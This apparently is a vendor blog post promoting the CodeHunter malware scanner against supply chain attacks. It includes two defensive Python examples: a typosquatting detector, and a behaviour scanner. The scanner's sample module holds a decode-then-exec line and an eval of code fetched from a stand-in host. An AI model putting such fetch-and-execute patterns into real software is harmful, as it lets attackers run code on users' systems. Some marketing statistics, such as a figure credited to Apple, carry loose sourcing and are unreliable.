Software supply chain attacks are on the rise. And why wouldn’t they be? A successful attack on any single link in a software supply chain can spell disaster downstream. We’re witnessing the birth of a whole new generation of vulnerabilities as software becomes increasingly complex and interconnected.
Most cybersecurity solutions available today are built to detect known threats, and that is a serious problem for protecting supply chains: by the time a security team has detected a new threat, its effects have already spread down the chain, and sometimes beyond it.
With largely reactive tools built to deal with the already known, dealing with, let alone preventing, new, advanced, and complex attacks on software supply chains requires a proactive defense strategy and proactive tooling to go with it.
Threats Don’t Sleep, and Neither Does CodeHunter
Threat actors often approach software supply chain attacks by undermining code signing: malicious code is slipped into the software under the identity of a known and trusted author, so that it carries a signature a consumer is inclined to accept. A valid signature proves who signed the code, not that the code is safe to run. CodeHunter operates in line with zero-trust principles: where a manual review or a preset allow rule might wave code through because it came from a "trusted" source, CodeHunter's automated analysis checks every submission for suspicious or threatening behaviors, signed or not.
Likewise, updates are a routine part of any software's life after release, and they are also a gateway for malicious code via update hijacking: a threat actor who compromises a vendor's update mechanism rides a legitimate-looking update straight into an unsuspecting network, and such vendor compromises are increasingly common. Painstakingly combing through every update for malicious code by hand would be labor intensive, slow, and expensive. CodeHunter scrutinizes each update for suspicious behaviors and gives security teams actionable intelligence in a fraction of the time an advanced analyst would need for the same task.
CodeHunter Finds Threats in Open-Source Code at Scale
Another weak point in software supply chains is compromised open-source code. The 2024 backdoor in xz Utils (the liblzma compression library, CVE-2024-3094) showed that even open-source code trusted for years can be undermined by malicious actors. In that case a maintainer inserted a backdoor into the library's release build that, on distributions whose sshd links liblzma, gave the attacker a hook into OpenSSH. The backdoored versions shipped in testing and rolling-release builds of several Linux distributions but had not yet reached stable production releases. The backdoor was caught before it could wreak havoc, largely because one engineer noticed sshd behaving oddly, but that is far from the norm.
The sheer scope of open-source code makes defending against this kind of tactic seem unrealistic. If malicious code did get compiled into your software through such an attack, CodeHunter can be configured to automatically scan entire directories, and even whole networks, locally or in the cloud, to find it. By operating in the cloud and at scale, CodeHunter helps proactively prevent breaches involving data stored in the cloud, which, according to a recent report published by Apple, account for over 80% of all breaches.
CodeHunter Catches Things Humans Miss
Though we do our best to protect our assets, we can't always get everything right. Even when we err on the side of caution, it's unrealistic to depend on individuals to catch every malicious behavior slipping through the cracks. In the past year, valid accounts were the preferred initial access technique of cybercriminals, with a 71% increase in the volume of attacks using valid credentials. Those credentials are typically harvested by information stealers, which in turn usually arrive through social engineering that relies on employees to expose secure information.
This type of trickery can be replicated anywhere. A joint study between Stanford and Tessian found that approximately 88% of all data breaches involve an employee mistake. Typosquatting is enough on its own: a file or package name that differs from a legitimate one by a swapped letter, a digit in place of a letter, or a look-alike Unicode character will get past even the sharpest set of eyes. This is where CodeHunter's ability to tell suspicious code apart from legitimate code becomes a vital key to protecting your enterprise.
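The look-alike name trick described above can be caught mechanically, which is how a practitioner would want to back up human review. The following is an added example, not CodeHunter's code: it normalises candidate names so that common substitutions (digits for letters, Cyrillic homoglyphs, dropped or doubled letters, separators) collapse onto the legitimate spelling, then compares the result against an allowlist. The allowlist, the confusables table and the candidate names are constructed for illustration.

```python
"""Flag file or package names that look like, but are not, a known-good name.

Added example, not CodeHunter's code. The allowlist, the confusables table
and the candidate names below are constructed for illustration.
"""
import unicodedata
from difflib import SequenceMatcher

# Constructed allowlist: names the organisation actually expects to see.
KNOWN_GOOD = {"svchost.exe", "requests", "lodash", "openssl", "python3"}

# Characters attackers swap for visually similar ones. Assumption: a small
# hand-written table; a real scanner would load Unicode's confusables data.
CONFUSABLES = str.maketrans({
    "0": "o", "1": "l", "3": "e", "5": "s", "7": "t",
    "\u0430": "a",  # Cyrillic a
    "\u0435": "e",  # Cyrillic ie
    "\u043e": "o",  # Cyrillic o
    "\u0440": "p",  # Cyrillic er
    "\u0441": "c",  # Cyrillic es
    "\u0455": "s",  # Cyrillic dze
})


def skeleton(name: str) -> str:
    """Collapse a name to a form in which look-alike spellings coincide:
    Unicode-normalised, case-folded, confusables mapped to ASCII,
    separators dropped and doubled letters collapsed."""
    name = unicodedata.normalize("NFKC", name).casefold().translate(CONFUSABLES)
    out = []
    for ch in name:
        if ch in "-_.":
            continue
        if out and out[-1] == ch:
            continue
        out.append(ch)
    return "".join(out)


def classify(name: str, threshold: float = 0.8):
    """Return (closest_known_name, verdict).

    verdict is "exact" when the name is on the allowlist, "lookalike" when it
    is not but resembles an allowlisted name at or above `threshold` after
    skeleton normalisation, and "unrelated" otherwise.
    """
    if name in KNOWN_GOOD:
        return name, "exact"
    cand = skeleton(name)
    best, best_score = None, 0.0
    for good in sorted(KNOWN_GOOD):
        ref = skeleton(good)
        score = 1.0 if cand == ref else SequenceMatcher(None, cand, ref).ratio()
        if score > best_score:
            best, best_score = good, score
    if best_score >= threshold:
        return best, "lookalike"
    return None, "unrelated"


if __name__ == "__main__":
    # Constructed candidates: a digit swap, a dropped letter, a Cyrillic
    # homoglyph, a genuine name and an unrelated name.
    for candidate in ("svch0st.exe", "requsts", "r\u0435quests", "lodash", "notepad.exe"):
        print(f"{candidate!r:>20} -> {classify(candidate)}")
```

Note that the exact-match check runs before normalisation: a name that is byte-for-byte on the allowlist is accepted, while a name whose skeleton matches but whose raw spelling does not is exactly the case typosquatting relies on and is reported as a look-alike. The similarity threshold is a tuning knob; lower it and you catch more distant variants at the cost of more false positives on short names.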
Even Unknown Threats Have No Place to Hide
We don’t always see threats for what they are, especially with all the moving parts in a software supply chain. It’s the perfect setup for a Trojan horse since it relies on passing under the radar disguised as a section of innocent-looking code.
Trojan horses often get in through typosquatting, as described above, or through any number of other routes. They are ubiquitous and are not always cataloged in the malware databases that traditional signature-based tools rely on to identify malicious code. CodeHunter scans for suspicious behavior regardless of the correctly functioning code surrounding it, an effective filter that does not depend on having a signature for the malware in question.
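To make the behavior-versus-signature distinction concrete, here is an added example (not CodeHunter's code, and far simpler than a real analysis engine) that triages a Python module by behavior. It walks the syntax tree looking for two patterns that have no legitimate reason to appear in most code, decode-then-execute and fetch-then-execute, and reports them wherever they occur, ignoring the benign code around them. The rule sets and the sample module are constructed for illustration; the sample is parsed, never executed.

```python
"""Behavior-based triage of a Python source file.

Added example, not CodeHunter's code. The rule sets and the sample module are
constructed; the sample is only parsed, never executed.
"""
import ast

EXEC_SINKS = {"exec", "eval"}
DECODE_SOURCES = {"b64decode", "b32decode", "b85decode", "a85decode",
                  "fromhex", "unhexlify", "decompress"}
NETWORK_SOURCES = {"urlopen", "recv", "recvfrom", "recv_into"}


def _callee(call: ast.Call) -> str:
    """Simple name of the function being called: 'b64decode' for
    base64.b64decode(...), 'exec' for exec(...)."""
    func = call.func
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute):
        return func.attr
    return ""


def _sources_in(node: ast.AST) -> set:
    """Which suspicious data sources feed into this expression."""
    found = set()
    for sub in ast.walk(node):
        if isinstance(sub, ast.Call):
            name = _callee(sub)
            if name in DECODE_SOURCES:
                found.add("decoded")
            elif name in NETWORK_SOURCES:
                found.add("network")
    return found


def scan_source(src: str):
    """Return a sorted list of (lineno, finding) tuples for the module text."""
    tree = ast.parse(src)

    # Pass 1: a variable assigned from a suspicious source is tainted.
    tainted = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Assign):
            srcs = _sources_in(node.value)
            if srcs:
                for target in node.targets:
                    if isinstance(target, ast.Name):
                        tainted[target.id] = srcs

    # Pass 2: a sink fed directly, or through a tainted variable, is a finding.
    findings = []
    for node in ast.walk(tree):
        if not (isinstance(node, ast.Call) and _callee(node) in EXEC_SINKS):
            continue
        srcs = set()
        for arg in node.args:
            srcs |= _sources_in(arg)
            for sub in ast.walk(arg):
                if isinstance(sub, ast.Name) and sub.id in tainted:
                    srcs |= tainted[sub.id]
        for kind in sorted(srcs):
            findings.append((node.lineno, f"{kind}-then-{_callee(node)}"))
    return sorted(findings)


# Constructed sample: mostly ordinary code with two buried suspicious spots.
SAMPLE_MODULE = '''\
import base64, hashlib, urllib.request

def checksum(path):
    """Perfectly ordinary helper that most of the file is made of."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def version():
    return "1.4.2"

# The one suspicious pair of lines, buried among the benign ones.
_cfg = base64.b64decode("cHJpbnQoJ2hlbGxvJyk=")
exec(_cfg)

def update_check():
    body = urllib.request.urlopen("https://example.invalid/u").read()
    eval(body)
'''

if __name__ == "__main__":
    for lineno, finding in scan_source(SAMPLE_MODULE):
        print(f"line {lineno}: {finding}")
```

Nothing here knows what the decoded payload is; the finding rests purely on the shape of the behavior (data that is decoded or fetched at run time being handed to an interpreter), which is why it fires just as well on a sample nobody has ever seen before. The checksum helper and the version function around it contribute nothing to the verdict, which is the property the paragraph above is describing.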
Mitigate the Potential Damage Done
The longer a software supply chain stays compromised, the more damage is done. Identifying an attack before it spreads to the other links in the chain is critical and time-sensitive. The infamous SolarWinds attack comes to mind: roughly 18,000 customers unknowingly downloaded an Orion update containing a malicious backdoor. Insured losses from this undetected compromise are estimated at around $90 million, and the company itself reported roughly $40 million in losses over the 9 months following the attack.
IBM found the average cost of a breach stemming from a compromised software supply chain to be $4.63 million in 2023, making supply chain attacks more costly to remediate than the average malware attack. The longer a malicious intrusion sits undetected on your company's systems, the greater the damage it will inflict. This is why CodeHunter is designed to find threats as soon as they cross your threshold, with automated, fast scanning.
Empower Your Software Supply Chain Security
There’s no shortage of cyberthreats to software supply chains. CodeHunter’s combination of scalability and automation makes it the ideal defense against these types of cyberattacks. Defend your software supply chain more effectively in a fraction of the time and with fewer resources today.
Speak with one of our malware hunting experts today to learn more.
Advanced malware threats can slip past existing security solutions. Find them with CodeHunter.